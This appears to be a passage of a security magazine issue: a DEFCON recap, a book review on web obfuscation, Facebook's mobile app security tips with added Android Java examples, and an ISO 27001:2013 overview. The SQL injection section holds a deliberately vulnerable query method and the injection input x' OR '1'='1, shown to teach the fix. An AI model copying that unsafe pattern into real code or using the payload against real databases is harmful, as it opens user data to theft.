Another interesting topic this year was Android. Talks included an IDS for Android and another which bypassed SEAndroid using some techniques (or abusing some bugs) while rebooting the machine.

From the panel talks’ side, the focus this year was on the Snowden leaks and PRISM operations, with the absence of NSA guys and any governmental guy involved in this operation. I attended “An Open Letter - The White Hat's Dilemma”, which talked about the ethics of hacking and security and the move of many companies toward collecting “everything” and creating algorithms to do big data analytics to get information on the whole attack. He talked mainly from the ethics side and asked the audience what they would do “honestly” if they faced a situation in the gray area between ethics, security and your career.

There were also presenters talking about Malware they created like “A Thorny Piece Of Malware (And Me)” and another one “How my Botnet Purchased Millions of Dollars in Cars”.

There were also many presentations about exploitation. From the attack side, there were a couple of presentations; one of them talked about hacking cars and released code, tools and exploits to remotely control and hack vehicles like the Toyota Prius, in “Adventures in Automotive Networks and Control Units”. It was a very famous topic this year, but unfortunately I didn’t attend it; I can’t wait for the video release.

Another one talked about exploiting hackers’ offensive tools, in “Pwn'ing You(r) Cyber Offenders”: from returning fake results while they do port scanning or OS fingerprinting, to hacking their tools by sending them an XSS script (for web-based tools) or exploiting shellcode (for binary-based tools).

On the defense side, there were two presentations about detecting exploited processes and memory corruption. One of them was “EMET 4.0 PKI Mitigation”; EMET is a tool created by Microsoft to detect exploited processes and memory corruption, but in this talk they focused on detecting invalid SSL certificates.

And my presentation this year was in the same category. In this presentation “EDS: Exploitation Detection System” I talked about a new concept and my new tool. As I said it focuses in depth on processes’ memory to detect memory injections, shellcode, exploitation techniques or any attack vector. It focuses on monitoring the abnormal behavior allowing you to correlate it with the suspicious memory patterns found in the process. It’s similar to EMET but it’s more mature and uses a wider approach.

Not all DEFCON presentations this year were serious. There were presentations for comedy and partying. The first presentation during the first day was created to welcome newbies to DEFCON and it was full of beer, wine and jokes.

The style of the DEFCON conference is similar to western parties in addition to the hackers style, but the whole experience was great and it’s an experience I will never forget.

References:
1. http://defcon-wireless-village.com/
2. http://www.wallofsheep.com/blogs/news/tagged/defcon
3. http://www.defcon.org/
4. http://www.social-engineer.org/


Amr Thabet, freelance malware researcher and author of the Pokas x86 Emulator and the Security Research and Development Framework


Book Review: Web Application Obfuscation

Web Application Obfuscation is written by Mario Heiderich, Eduardo Alberto Vela Nava, Gareth Heyes and David Lindsay.

Reviewed by Mohab Ali, web application security researcher at Syn-apse labs.


Dr. Mario Heiderich is the founder of cure53, a penetration testing company. He speaks at many conferences, is the author of two books and excels at client-side attacks and defense.

Eduardo Alberto Vela Nava is an information security researcher at Google. He previously worked at Alibaba Cloud Computing and Hi5. He specializes in web application, browser and browser plug-in security.

Gareth Heyes is an independent security researcher who occasionally delves into web development. He is the author of many web-related tools and sandboxes.

David Lindsay is a senior security consultant with Cigital Inc. He researches web application vulnerabilities and does pentests, code audits and code analysis.

The `Introduction` chapter recites the various modern usages of the Internet and its security aspects, such as general security, protection measures and attacks, and the definition of filtering and its usage in the web application security world. It explains the basic usage of regular expressions in filtering.

The authors recommend it for Penetration Testers, Security Researchers, Incident Responders and QA testers. I agree all of those will benefit from it, but I simply recommend it for anyone who is interested in Web Application attacks or defense.

Chapter 2, `HTML`, sheds light on the creation of HTML and its history. It explains the basic tags and structure of HTML markup, various function tags and comments, and it mentions the differences between browser engines and how rendering behavior differs between browsers.

This chapter also explains why obfuscation matters and the purpose of using it. It doesn't just show you the obfuscated code but also teaches you tricks to discover it yourself. It also shows you multiple ways to execute JavaScript, not just by using the SCRIPT tag. It dives into more advanced markup obfuscation, comments and broken protocol handlers, and then finishes with an overview of HTML5, XML and SVG.

Chapter 3, `JavaScript and VBScript`, is great! It explains JavaScript’s syntax and encoding, and then shows wicked ways of naming variables and value-assigning voodoo. It covers another scripting language that has been supported by Internet Explorer since the early days: VBScript. It will teach you comments, events, functions and encoding in VBScript. It also explains another language (which I had never heard of before) called E4X, which is apparently only supported by Firefox and is basically JavaScript mixed with XML support.

I overheard some people discussing protection against XSS; someone suggested banning the SCRIPT tag (which, as you may know, is a bad idea), and then someone else mentioned banning "alert" and other JavaScript functions/prototypes used in such attacks. Chapter 1 destroyed the first suggestion of banning "SCRIPT", because there are a dozen other tags that could be used, and the 4th chapter, as you’ll see, destroyed the other suggestion.

Chapter 4, `Nonalphanumeric JavaScript`, is by far my personal favorite. In this chapter you will learn to execute JavaScript without the use of alphanumerics (A-Z, 0-9), and I find that very impressive!

The chapter explains the different arithmetic and operators that are used to generate the executable JavaScript code.


Chapter 5, `CSS`, explains basic Cascading Style Sheets (CSS) syntax and some encoding and obfuscation. It then shows different CSS attack vectors, such as clickjacking (UI redressing), CSS style decompilation, CSS attribute readers, history attacks, LAN attacks and others.

Chapter 6, `PHP`, begins with an overview of PHP and its history. It then shows different methods of obfuscating PHP code. It explains PHP data types, including numerical strings and delimiting strings. Then it explains mixing data types with comments to make obfuscation even harder to reverse, and ends with how to evaluate and execute PHP code.

Chapter 7, `SQL`, introduces you to Structured Query Language (SQL), the most common language for directly interacting with databases. It makes you familiar with different DBMSs (MySQL/Postgres/Oracle/SQL 2008). It also shows the use of functions in various DBMSs for obfuscation, and the functions' capability of encoding the executed query. It explains the use of operators, comments, SQL and XML, intermediary characters, regular notation and delimiting. It also explains the use of Unicode and escaping in SQL. It shows various tricks for using browser databases (an HTML5 feature) to execute JavaScript code, and also shows ways of obfuscating those queries.

Chapter 8, `Web application firewalls and client-side filters`, first covers the development of the idea of and need for a WAF (web application firewall) and different kinds of filtering, and why it's sometimes impossible to apply security practices in the code itself, hence the need for a WAF. It shows attack vectors that bypass blacklisting WAFs and explains the idea of client-side filters and how to bypass those filters. It also focuses on bypassing the IE8 filter.

Chapter 9, `Mitigating bypass and attacks`, is meant for security researchers interested in defenses against the attacks explained in the earlier chapters. It explains suggested protections against code injection, HTML injection, XSS and server-side code execution. It then talks about protecting the DOM and how to use sandboxing, detecting arrays, code replacement, handling options, layers and proxying.

The final chapter is `Future development`, which discusses the security problems and challenges that web applications might face in the future. While it speaks about the future, it discusses the impact on current applications. It talks basically about data theft through improvised methods, and also about the security aspects of HTML5 and CSS3. It mentions the security risk of using new header fields and values, and browser plug-in security.

This book is a must-read for all security professionals; I recommend it especially for those who are focused on web application security. It doesn't matter whether you are into attack or defense mechanisms; this book will satisfy both needs. All the authors put a great deal of effort into making this out-of-the-box masterpiece. This book covers a lot of areas and is an awesome start for beginners and intermediates to make the leap into mastering obfuscation, evasion and filtering.


Top 12 advices from the Facebook security team on how to develop mobile apps securely

For everyone who couldn’t make the forum yesterday, we have documented some of the best practices for developing on Android and iOS, and we're excited to share them with other developers.

From the outset, it is important to note that making apps that are secure on Android and iOS is hard. When your application behaves in a manner that is unintended, it creates security and privacy implications for the end user, and these might not be restricted to the confines of your app but could potentially extend across the device.

More than ever, people are using their mobile device as their primary means of accessing the Internet. This provides not only unparalleled access to information, but also millions upon millions of applications built by third-party developers. This platform approach enables users to experience great apps built by developers both large and small. However, this decentralized platform approach only works if there are strong, industry-wide best practices around important app basics such as security.

Top risks include malware installed on the phone alongside your app, tools that allow malicious actors to snoop on device activity, and even malicious websites that can trigger actions in your app using custom URL schemes.

The only way to ensure that your application is secure is to engineer your application for security from the ground up. Here are some recommendations to reduce vulnerabilities in your application:


1. Use HTTPS in a secure way

HTTPS can help you protect the privacy of user data against a man-in-the-middle attack, which could manifest as snooping on data and stealing user sessions on the network.

However, to obtain this protection your app needs to perform several steps to verify the server to which it is connecting, and this process is very error-prone. Even a small mistake in verification can result in no protection at all. Read more here: http://crypto.stanford.edu/~dabo/pubs/abstracts/ssl-client-bugs.html

Android
Instead of using the SSLSocketFactory classes, you should use APIs like HttpsURLConnection, which are simpler to use and perform the correct verification steps on your behalf. HttpsURLConnection also adds features (including TLS tickets and SNI headers, which only work correctly after Jellybean) to the HTTPS connection that give you better performance than using raw SSL sockets. It is always better to use this API.

iOS
Similarly, on iOS it is preferable to always use the high-level API NSURLConnection for network requests. Lower-level APIs such as CFStream need explicit and often error-prone configuration of SSL.

Android and iOS
To debug network requests with a proxy such as Charles, you may prefer manually installing an SSL certificate on your test device rather than using preprocessor variables and debug-only code to deactivate SSL validation. See more: http://www.charlesproxy.com/documentation/faqs/ssl-connections-from-within-iphone-applications/

2. There are No Client Secrets

Often, developers will spend time trying to obfuscate secrets in the application, which will be used either to authenticate their app to their server or to perform a client-side OAUTH flow.

Trying to obfuscate a secret in Android and iOS clients is a futile effort, as the secrets can always be recovered using the abundance of reverse-engineering and debugging tools available for APKs (https://code.google.com/p/android-apktool/), Java (http://en.wikipedia.org/wiki/JAD_(JAva_Decompiler)) and Objective-C (http://www.fscript.org/).

a. Authenticating an app to your server
Often the goal of authenticating the app to the server is to prevent users from getting phished. A good solution to phishing is to support two-factor authentication for your application. Facebook login approvals (https://www.facebook.com/note.php?note_id=10150172618258920) is an example of a large-scale two-factor authentication solution that millions of people use daily.

b. OAUTH
Do not expose your OAUTH secrets to the world via your client application. Store the OAUTH secrets on your server so that they are indeed secret. To obtain an OAUTH token, the client would then request an endpoint on your server that proxies the token request to the OAUTH provider with the secret and then returns the token to the client. Once the client obtains the OAUTH token, it can directly make requests to the OAUTH provider.

3. WebViews

Android
Some applications use Android WebViews and store cookies in the WebViews to access remote servers.

You should restrict the web pages that can load inside your WebView with a whitelist. If you are only going to open pages from your domain in the WebView, you should restrict it to those.

This will prevent others from triggering the loading of local resources such as javascript:// URLs and file:// URLs, which can be used to XSS users on Android. (Read more here: http://www.80vul.com/android/android-0days.txt)
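A whitelisting WebViewClient for the Android WebView advice in section 3 above, as an added example (not code from the article or from Facebook). The class name and the allowed host names are constructed for the example.

```java
import android.net.Uri;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

// Hypothetical client (added example): only https pages on a fixed set of
// our own hosts may load. The host list below is constructed.
public class WhitelistWebViewClient extends WebViewClient {

    private static final Set<String> ALLOWED_HOSTS = new HashSet<>(
            Arrays.asList("www.example.com", "m.example.com"));

    // True only for https://<allowed host>/... . Uri.getHost() is null for an
    // opaque URL such as javascript:alert(1) and empty for file:///..., so the
    // local-resource URLs the article warns about fail this check as well.
    static boolean isAllowed(String url) {
        if (url == null) {
            return false;
        }
        Uri uri = Uri.parse(url);
        String scheme = uri.getScheme();
        String host = uri.getHost();
        return "https".equalsIgnoreCase(scheme)
                && host != null
                && ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
    }

    // Called for navigations started from inside the page (links, redirects,
    // location changes). Returning true tells the WebView not to load the URL.
    @Override
    public boolean shouldOverrideUrlLoading(WebView view, String url) {
        return !isAllowed(url);
    }

    // The app's own loadUrl() calls do not go through shouldOverrideUrlLoading,
    // so the same check must be applied before the initial load.
    static boolean loadIfAllowed(WebView webView, String url) {
        if (!isAllowed(url)) {
            return false;
        }
        webView.loadUrl(url);
        return true;
    }

    // Install the client and close the settings that let a page reach local
    // files and content providers.
    static void harden(WebView webView) {
        webView.setWebViewClient(new WhitelistWebViewClient());
        WebSettings settings = webView.getSettings();
        settings.setAllowFileAccess(false);     // no file:// URLs from the page
        settings.setAllowContentAccess(false);  // no content:// URLs from the page
        settings.setJavaScriptEnabled(false);   // enable only if the page needs it
    }
}
```

Sub-frame and sub-resource loads are not reported to shouldOverrideUrlLoading; if the page embeds them, extend the same host check to shouldInterceptRequest.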


4. Tap-Jacking

Android
Other applications can overlay content over your application and fool users into clicking buttons in your app underneath.

To prevent this, consider setting the setFilterTouchesWhenObscured (http://developer.android.com/reference/android/view/View.html#setFilterTouchesWhenObscured) property to true on your views. This will prevent your application from receiving touches when another application is obscuring it.

iOS
Proofs of concept exist on iOS as well (http://www-personal.umich.edu/~yangqi/pivot/mobile_phishing_defense.pdf), although this issue should concern only jailbroken devices.

5. Race Conditions on Installing Apps

Permission stealing [Android]

Other apps that are installed before your app could steal Android permissions (including signature-level permissions) that you have declared in your manifest by declaring them before you.

Your app will function normally, but as a result of this, malware that steals permissions could snoop into all of your app's content providers and other components.

To prevent this, reduce the exposure of components and also explicitly authenticate the callers of your components.

Stealing of URL schemes [iOS]

Except for a core subset managed by iOS, URL schemes are registered on a first-come, first-served basis.

6. Controlling Exposed Features

Activities, services and broadcast receivers [Android]

You should aim to expose as little of your application as possible to other, potentially malicious, applications. Not setting intent filters on components, or explicitly setting "exported=false", will make components local to your application. This is the most effective way of protecting components.

Make sure that before any action that changes the state of your app is taken, the user performs a UI action like clicking a button (this is analogous to CSRF protection in web applications). It is dangerous to perform a write action based on an intent extra passed into a component.

Exposed URL schemes [iOS]

Similarly, iOS apps should not perform state-changing actions when processing URLs without asking for confirmation from the user.

7. Watch Out for Internal URL Schemes

In addition to exposed URL schemes, it is common to define custom URL schemes internal to an iOS or Android app so as to let trusted sources trigger specific actions.

iOS
In the simple case, a UIWebView is just a web browser tab sharing its cookie storage with the app. However, more complex interactions are often needed between the embedded JavaScript and the app. This is usually done by having the app catch and interpret URLs of a special scheme in the outgoing requests of the WebView. These interactions must be carefully reviewed. In particular:

a. if the WebView is meant to browse the web, it should not be given large privileges over the native app;

b. if they include user-controlled strings (this typically includes the initial URL and any string injected into the JavaScript environment using stringByEvaluatingJavaScriptFromString:), make sure to sanitize the native inputs of WebViews.


Android
When using custom URL schemes in intent filters, be cognizant of the fact that they can be triggered not only by apps installed on the device, but also by malicious websites that the user opens in the browser by simply clicking on a link. This triggers an ACTION_VIEW intent for the URL that was clicked, so the user does not need to install malware for an attacker to exploit a particular component if it has another vulnerability.

iOS
Make sure to distinguish internal URLs created by trusted sources from public URLs callable by external apps or made clickable in user content. The library class NSDataDetector does not restrict the schemes of URLs detected in user content.

8. Authenticating Callers of Components

Android

a. Activities
Consider calling activities that need to know their caller using startActivityForResult(). The callee Activity can then enforce the identity of the caller using getCallingPackage(), ensuring that it is non-null and is the package that it expects. A signature check using PackageManager is the most effective way of ensuring the caller is from the same app family as the callee.

b. Content Providers
The user id of the caller can be obtained using Binder.getCallingUid(), and can be used for permission enforcement via signature checks.

c. Broadcast Receivers
There is currently no way to get the identity of the initiator of a broadcast. For system broadcasts, check the action string of the incoming intent to make sure the intent is coming from the system.

d. Services
Services can enforce the caller using Binder.getCallingUid() and signature checks. However, services using the messaging IPC mechanism cannot get the caller uid in the handleMessage() callback. Consider using AIDL-based service calls for exposed services.

iOS
Rather than UIApplicationDelegate:application:handleOpenURL:, you may want to implement UIApplicationDelegate:application:openURL:sourceApplication:annotation: and use sourceApplication to authenticate a URL caller over time. To mitigate spoofing of callers' URL schemes, the Facebook SDK also lets callers to the main app choose an encryption key for their response.
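The two Android caller checks from section 8 (getCallingPackage() for Activities, Binder.getCallingUid() for content providers and AIDL services), combined with a PackageManager signature check, as an added example that is not the article's or Facebook's code. The helper class is hypothetical.

```java
import android.app.Activity;
import android.content.Context;
import android.content.pm.PackageManager;
import android.os.Binder;
import android.os.Process;

// Hypothetical helper (added example): decide whether the caller of an exposed
// component is signed with the same key as this app.
public final class CallerCheck {

    private CallerCheck() {
    }

    // Activities: getCallingPackage() is non-null only when the caller used
    // startActivityForResult(); anything else is treated as untrusted.
    // checkSignatures() compares signing keys, so a spoofed package name
    // chosen by malware does not get it through.
    static boolean callerIsTrusted(Activity activity) {
        String caller = activity.getCallingPackage();
        if (caller == null) {
            return false;
        }
        PackageManager pm = activity.getPackageManager();
        return pm.checkSignatures(caller, activity.getPackageName())
                == PackageManager.SIGNATURE_MATCH;
    }

    // Content providers and AIDL services: Binder.getCallingUid() identifies the
    // process on the other side of the current Binder transaction. Our own uid
    // is trusted; every other uid must carry our signing key.
    static boolean binderCallerIsTrusted(Context context) {
        int callingUid = Binder.getCallingUid();
        if (callingUid == Process.myUid()) {
            return true;
        }
        PackageManager pm = context.getPackageManager();
        return pm.checkSignatures(callingUid, Process.myUid())
                == PackageManager.SIGNATURE_MATCH;
    }

    // Call first in query()/insert()/update()/delete() of an exposed provider,
    // or in each AIDL method of an exposed service; the exception aborts the
    // transaction before any data is touched.
    static void requireTrustedBinderCaller(Context context) {
        if (!binderCallerIsTrusted(context)) {
            throw new SecurityException(
                    "untrusted caller uid " + Binder.getCallingUid());
        }
    }
}
```

As the article notes, this does not help in a Messenger-style handleMessage() callback, where the calling uid is not available.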

9. Use explicit intents and Intent hijacking [Android]

If private data is being transmitted in an intent, use explicit intents. Explicit intents ensure that the callee receiving the intent will be the one that the caller intended to receive the intent.

Android provides ways to call components using implicit intents; however, keep in mind that implicit intents could allow a malicious application to hijack the intent.

If using implicit intents, you should dynamically resolve the receivers of the intent and perform signature checks before sending the intent. "setPackage" is also an option, which restricts the package that can receive an intent. However, this works only after Ice Cream Sandwich.
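Resolving an implicit intent, keeping only receivers signed with our own key and then sending it explicitly, as section 9 recommends; an added example, not the article's or Facebook's code. The helper class and the action name are constructed.

```java
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.pm.ResolveInfo;

import java.util.List;

// Hypothetical helper (added example) for delivering private data only to a
// component we trust.
public final class TrustedIntents {

    private TrustedIntents() {
    }

    // Returns the explicit intent that was started, or null when no activity
    // signed with our key handles it (in which case nothing is sent at all).
    static Intent startTrustedActivity(Context ctx, Intent implicit) {
        PackageManager pm = ctx.getPackageManager();
        List<ResolveInfo> candidates = pm.queryIntentActivities(implicit, 0);
        for (ResolveInfo info : candidates) {
            String pkg = info.activityInfo.packageName;
            boolean sameKey = pm.checkSignatures(pkg, ctx.getPackageName())
                    == PackageManager.SIGNATURE_MATCH;
            if (sameKey) {
                // Keep action and extras but pin the exact component: another
                // app declaring the same intent filter can no longer receive it.
                Intent explicit = new Intent(implicit);
                explicit.setComponent(
                        new ComponentName(pkg, info.activityInfo.name));
                ctx.startActivity(explicit);
                return explicit;
            }
        }
        return null; // never fall back to broadcasting the implicit intent
    }

    // The alternative the article mentions: setPackage() keeps the intent
    // implicit but limits delivery to one package (the article notes this
    // only works after Ice Cream Sandwich).
    static Intent restrictedToOwnPackage(Context ctx, Intent implicit) {
        Intent copy = new Intent(implicit);
        copy.setPackage(ctx.getPackageName());
        return copy;
    }

    // Constructed example of an intent carrying private data; it must only
    // ever leave the app through one of the two helpers above.
    static Intent syncRequest(String sessionToken) {
        Intent i = new Intent("com.example.app.action.SYNC");
        i.putExtra("session_token", sessionToken);
        return i;
    }
}
```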

10. Open redirects

You could protect all your components with permissions and checks; however, if there exists even one component in your application that takes a component as an input and redirects to that component, this could be used to circumvent all checks. Avoid this practice at all costs.

11. SQL injection

Android
SQLiteQueryBuilder is a standard way of building SQL queries for Android. However, even though it seems to be safe against SQL injection attacks, under the hood it simply concatenates strings. This allows attackers to insert arbitrary clauses into the SQL statement.

You must carefully sanitize user input strings to content providers that are exposed.
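The concatenation problem from section 11 beside its fix, as an added example (not the article's or Facebook's code): the same SQLiteQueryBuilder, first with a user string pasted into the WHERE clause, then with a bound parameter, and finally a provider-style query that also validates the caller-supplied projection and selection. The "notes" table and its columns are constructed.

```java
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteQueryBuilder;

import java.util.HashMap;
import java.util.Map;

// Hypothetical query code (added example) for a constructed "notes" table
// with columns _id, owner and title.
public final class NoteQueries {

    private static final String[] COLUMNS = {"_id", "owner", "title"};

    private NoteQueries() {
    }

    // Vulnerable: owner is concatenated into the WHERE clause, so an input
    // such as   x' OR '1'='1   produces   owner = 'x' OR '1'='1'
    // and returns every user's notes.
    static Cursor notesForOwnerUnsafe(SQLiteDatabase db, String owner) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables("notes");
        qb.appendWhere("owner = '" + owner + "'");
        return qb.query(db, COLUMNS, null, null, null, null, null);
    }

    // Fixed: the value is passed as a bound parameter. SQLite never parses it
    // as SQL, so the same input simply matches no row.
    static Cursor notesForOwner(SQLiteDatabase db, String owner) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables("notes");
        return qb.query(db, COLUMNS, "owner = ?", new String[]{owner},
                null, null, null);
    }

    // An exposed ContentProvider.query() also receives projection, selection
    // and sortOrder from the caller. Strict mode with a projection map makes
    // the builder reject unknown columns and selections that break out of
    // their parentheses; the owner restriction is still bound, not pasted.
    static Cursor providerQuery(SQLiteDatabase db, String owner,
                                String[] projection, String selection,
                                String[] selectionArgs, String sortOrder) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables("notes");
        qb.setStrict(true);
        Map<String, String> projectionMap = new HashMap<>();
        for (String column : COLUMNS) {
            projectionMap.put(column, column);
        }
        qb.setProjectionMap(projectionMap);
        // The builder emits "(appended where) AND (selection)", so our bound
        // owner value must come before the caller's selection arguments.
        qb.appendWhere("owner = ?");
        String[] args = prepend(owner, selectionArgs);
        return qb.query(db, projection, selection, args, null, null, sortOrder);
    }

    private static String[] prepend(String first, String[] rest) {
        int n = rest == null ? 0 : rest.length;
        String[] out = new String[n + 1];
        out[0] = first;
        if (n > 0) {
            System.arraycopy(rest, 0, out, 1, n);
        }
        return out;
    }
}
```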


iOS
You should refrain from constructing SQL query strings directly and instead use a more abstract framework such as EGODatabase or FMDB.

12. Language-Based Vulnerabilities [iOS]

Objective C is susceptible to a variety of programming errors that can be exploited:

* C fragments are vulnerable to the classical C vulnerabilities such as buffer overflows.

* Zombie objects may be exploited.

* User-dependent inputs occurring in format strings, selectors, or regular expressions may be exploited.

* It is important to keep in mind that static types appearing in the code are not enforced at runtime.

* Returning nil values on failures and unimplemented selectors is often ok. Yet, unexpected nil values can cause a crash with some library functions, and can yield unpredictable results in general (for instance [nil isEqualToString:nil] == 0).


Alex Rice, a security engineer at Facebook


In this article I will provide an overview of the new information security management system standard, ISO/IEC 27001:2013, which was published only a few days ago.

ISO/IEC 27001:2013 provides requirements for establishing, implementing, maintaining and continually improving an information security management system.

The adoption of an information security management system is a strategic decision for an organization. The establishment and implementation of an organization’s information security management system is influenced by the organization’s needs and objectives. The standard covers all types of organizations (e.g. commercial, government agencies, non-profits), all sizes (from micro-businesses to huge multinationals), and all industries/segments (e.g. retail, banking, defense, healthcare, education and government).

The Information Security Management System (ISMS) preserves the confidentiality, integrity and availability of information by applying a risk management process, and gives confidence to interested parties that risks are adequately managed.

• Confidentiality - ensuring that access to information is appropriately authorized

• Integrity - safeguarding the accuracy and completeness of information and processing methods

• Availability - ensuring that authorized users have access to information when they need it.

ISO/IEC 27001:2013: An Overview


ISO 27001 History

• 1992: The Department of Trade and Industry (DTI), which is part of the UK Government, publishes a 'Code of Practice for Information Security Management'.

• 1995: This document is amended and re-published by the British Standards Institute (BSI) as BS7799.

• 2000: In December, BS7799 is again re-published, this time as a fast-tracked ISO standard. It becomes ISO/IEC 17799.

• 2005: ISO/IEC 27001:2005 is published; this is a specification for an ISMS (information security management system), which aligns with ISO 17799 and is compatible with ISO 9001 and ISO 14001.

• 2013: ISO/IEC 27001:2013, a new information security standard, is published on 25/09/2013. It cancels and replaces ISO 27001:2005.

ISO 27001 Family

The ISO 27000 family provides best practice recommendations on information security management, risks and controls within the context of an overall information security management system (ISMS), aligned with the management systems for quality assurance of the ISO 9000 family.

ISO 27000: Vocabulary

ISO 27001: Information Security Management System Requirements

ISO 27002: Code of Practices

ISO 27003: Information technology - Security techniques - Information security management system implementation guidance - Published 2010

ISO 27004: Information technology - Security techniques - Information security management - Measurement - Published 2009

[Figure: ISO 27001 timeline, from the 1992 Code of Practice for Information Security Management to BS7799 (1995), ISO/IEC 17799 (2000), ISO/IEC 27001:2005 and ISO/IEC 27001:2013]


ISO 27005: Information technology -- Security techniques -- Information security risk management - Published 2011

ISO 27006: Information technology -- Security techniques -- Requirements for bodies providing audit and certification of information security management systems - Published 2011

ISO 27007-ISO 27008: Information technology -- Security techniques -- Guidelines for auditors on information security controls - Published 2011

ISO 27011: Information technology -- Security techniques -- Information security management guidelines for telecommunications organizations based on ISO/IEC 27002 - Published 2008

ISO 27799: Health informatics -- Information security management in health using ISO/IEC 27002 - Published 2008

Benefits of ISO 27001

Implementing ISO/IEC 27001:2013 and obtaining certification from a certification body demonstrates that the security of the organization's information has been addressed and that valuable data and information assets are properly controlled.

By achieving certification to ISO/IEC 27001:2013, an organization will be able to acquire numerous benefits, including:

ISO/IEC 27001:2013 Structure and Content

It is a new format and wording of the Information Security Management System (ISMS) standard.

This structure is a new formulation of ISO management system standards, aligned with “Annex SL”, which allows an organization to implement multiple related ISO management standards at the same time.

Now any organization can implement ISO/IEC 27001:2013 together with ISO 22301:2012 (Business Continuity Management System) at the same time.


Structure

All clauses from 4 to 10 below are mandatory requirements for implementation and certification of ISO/IEC 27001:2013.

0. Introduction The Objective of an Information Security Management System (ISMS) 1. Scope State the Applicability of Standard within Context of Organization 2. Normative References Overview and Vocabulary 3. Terms and Definitions a brief, formalized glossary Including Common Terms and Definition of ISMS 4. Context of Organization It has to determine organization needs and Expectations and Interested Parities 5. Leadership Establish role of Top management toward ISMS 6. Planning Establish Organization Strategic Objects and Risk Management 7. Support Determined Organizational Resources and Competencies Requirements and Standard Documentation Required 8. Operation The Information Security Requirements of the ISMS and way to address it 9. Performance Evaluation Measurement of ISMS Performance 10. Improvement Identify and act toward nonconformity of ISMS through Corrective Action and Ensure of Continual improvement of ISMS

Annex A Control Objective and Controls List of Control area and control objectives and Controls of ISMS

Annex A Control Objectives and Controls: 114 Security Controls

Annex A is the best-known series of security control objectives for implementing ISO/IEC 27001:2013. All Annex A controls are optional to implement. Annex A consists of:
» 14 Control Areas: core topic areas covering most aspects of information security
» 34 Control Objectives: the objectives of the controls
» 114 Controls: applicable controls to be implemented in the ISMS program

A.5: Information Security Policies: management and updating of the organization's information security policies

A.6: Organization of Information Security: management of the organization's information security, including defined roles and responsibilities, segregation of duties, mobile devices and teleworking

A.7: Human Resources Security: management of the organization's human resources, including prior to and during the employment relationship


Control Area                                          Number of Controls   Annex A No.
Operations security                                   14                   A12
Asset management                                      10                   A8
Information Security Incident management              7                    A16
Organization of Information Security                  7                    A6
System acquisition, development, and maintenance      13                   A14
Cryptographic                                         2                    A10
Compliance                                            8                    A18
Information Security Policies                         2                    A5
Communications Security                               7                    A13
Access Control                                        14                   A9
Information Security aspects of Business Continuity   4                    A17
Human resources security                              6                    A7
Supplier Relationship                                 5                    A15
Physical and environmental Security                   15                   A11
Total Number of Controls                              114

A.8: Asset Management: management of the organization's assets

A.9: Access Control: management and control of access to the organization's information

A.10: Cryptography: control of the use of cryptography inside the organization

A.11: Physical and Environmental Security: management and control of the organization's physical and environmental access

A.12: Operations Security: management and control of all operational security, including operational procedures and responsibilities, logging and monitoring, technical vulnerability management and information systems audit

A.13: Communications Security: management and control of the organization's communications security, including network security management and information transfer controls

A.14: System Acquisition, Development and Maintenance: management and control of the system development cycle, including identifying and enforcing security requirements and securing the development of systems

A.15: Supplier Relationships: management of supplier relationships, including applying information security to supplier relationships and supplier service delivery management

A.16: Information Security Incident Management: management of information security incidents

A.17: Information Security Aspects of Business Continuity Management: management of information security continuity and redundancies

A.18: Compliance: management of the organization's compliance with legal and contractual requirements


The ISO/IEC 27001:2013 Certification Process

There are three core phases.

Phase I: Before the External Audit

1. Implementation of the ISMS: complete the implementation cycle of the Information Security Management System (ISMS), including the mandatory requirements and the optional controls.
2. Conduct an internal audit and have top management review the result: the organization conducts periodic internal audits to ensure the ISMS incorporates adequate controls that operate effectively, and top management reviews the findings.
3. Selection of a certification body: the organization selects a certification body (e.g. BSI, DNV, SGS) to conduct the external audit activity and certify the organization's ISMS program.

Phase II: External Audit

4. Stage 1 Audit: conducted off site or on site to determine whether your ISMS has met the requirements of the standard and is capable of being audited.
5. Stage 2 Audit: conducted on site to audit the effectiveness of the ISMS. Stage 1 and Stage 2 must both be completed to become ISMS certified.

Phase III: Following the Audit

6. Confirmation of registration: the lead auditor recommends to the certification manager of the certification body that the organization be certified. The certification manager reviews the organization's file to ensure that the recommendation has been made in an impartial, fair and competent manner. Upon completion of the above, the organization is officially certified to ISO/IEC 27001:2013.
7. Continual improvement and surveillance audits: the organization continues its internal audit activity, and the certification body's auditor conducts a surveillance audit of the organization every 6 or 12 months for the three years after the organization achieves ISO/IEC 27001:2013 certification.


Estimated Time Needed for Implementation and Certification of ISO/IEC 27001:2013

Based on my experience:

Phase I: Estimated time needed for implementation of ISO/IEC 27001:2013. The estimated duration depends on the organization's size (employees, systems and information):
• Small organization (50 - 150 employees): estimated time for implementation of the standard from 6-8 months
• Medium organization (150 - 400 employees): estimated time for implementation of the standard from 10-12 months
• Large organization (400 to 1000+ employees): estimated time for implementation of the standard from 13-16 months

Phase II: Estimated time needed for certification to ISO/IEC 27001:2013:
• Case 1: if there are one or more minor nonconformities and the organization corrects them accordingly, the certificate can be issued in around a month
• Case 2: if there are one or more major nonconformities and the organization corrects them accordingly, the certificate can be issued in around 3-5 months

Conclusion

ISO/IEC 27001:2013 gives an organization a complete information security management framework for implementing and maintaining security. In this article, I tried to shed some light on the new standard and its mandatory requirements, optional requirements, structure, benefits, certification process and the estimated time for implementation and certification.

References
• ISO/IEC 27001:2013 Information technology - Security techniques - Information security management systems - Requirements
• ISO/IEC 27002:2013 Information technology - Security techniques - Code of practice for information security controls
• The FDIS versions of ISO 27001 and ISO 27002
• http://www.pc-history.org/17799.htm


Ahmed Riad
MBCI, CBCP, ISO 27001 LA/LI, ISO 22301 LA
Senior Information Security Auditor at The Egyptian Credit Bureau "I-Score"
